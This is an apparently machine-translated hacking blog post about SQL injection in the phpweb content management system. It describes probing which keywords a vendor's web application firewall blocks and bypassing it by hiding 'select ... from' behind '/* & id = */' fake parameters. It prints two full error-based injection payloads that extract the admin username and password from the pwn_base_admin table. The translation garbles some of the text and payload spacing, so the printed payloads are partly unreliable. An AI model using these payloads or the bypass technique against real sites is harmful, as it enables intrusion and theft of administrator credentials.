Attackers can bypass the smart innovation firewall and inject SQL statements into phpweb.

Today, kiyou xiaoliumang sent a PHP Web site and then read it together. PHP Web has the injection vulnerability, as mentioned earlier. First, add some statements to check whether injection exists and an error can be reported. Although the single quotes we submitted in the SQL statement are changed to % 27, it doesn't matter if it is a matter of the browser. You can simply submit it using a proxy.

 

Then directly use the statement

? 116 '/**/and (select/**/1/**/from (select/**/count (*), concat (select/**/concat (0x7e, 0x27, pwn_base_admin.user, 0x27, 0x7e, pwn_base_admin.password, 0x27, 0x7e)/**/from/**/pwn_base_admin/**/limit/**/0, 1 )) /**/from/**/information_schema.tables/**/limit/**/0, 1), floor (rand (0) * 2 )) x/**/from/**/information_schema.tables/**/group/**/by/**/x) a)/**/and/**/'1'{'1.html

As a result, the waf of zhichuang appears. Www.2cto.com

 

 

I wanted to give up directly, and finally the Overlord had a hard bow. The idea is:

1. Check what statements the waf intercepts. First, submit keywords such as select, union, and from, and then combine these SQL keywords. Finally, it is found that if select from exists, it will intercept them, other combinations of matching keywords and keywords are not tested.

2. The first thing that comes to mind after bypassing is the case-sensitivity conversion. The result is useless. Generally, waf converts the case-sensitivity. The second is encoding. However, phpweb directly Concatenates the statement into an SQL query statement, therefore, even if the code can bypass waf, no valid SQL query statements are constructed.

3. I tried the protocol. I added a few spaces and a few question marks after the GET request. As long as it is not a bad request, I tried it. As a result, this GET data packet can be slightly changed, the bypass method is not found.

4. Let's talk about the bypass idea. In fact, phpweb and waf are used for different understandings. Phpwebdirectly Concatenates the statement before .html to the SQL query statement, regardless of whether the encoding is not encoded or whether "=" is available ", "&" (these two symbols are used to assign values and split parameters to parameters in the http protocol), and waf will parse the question mark based on the http protocol. In this way, we can use/* & id = */to separate the constructed SQL statements to bypass waf. The final construction statement is as follows:

/Product/class /? Id/* = */abc '/**/and/**/(select/**/1/* & id = */from (/* & id = */ select/** // * & id = */count (*), /* & id = */concat (/* & id = */select/**/(/* & id = * = */select/** // * & id = */concat (0x7e, 0x27, pwn_base_admin.user, 0x27, 0x7e, pwn_base_admin.password, 0x27, 0x7e) /** // * & id = */from/**/pwn_base_admin/**/limit/**/0, 1 )) /** // * & id = */from/**/information_schema.tables/**/* & id = */limit/**/0, 1 ), /* & id = */floor (rand (0) * 2 )) x/** // * & id = */from/**/* & id = */information_schema.tables/**/* & id = */group /** // * & id = */by/*/x) a)/** // * & id = */and/** // * & id = */'1'{'1.html

: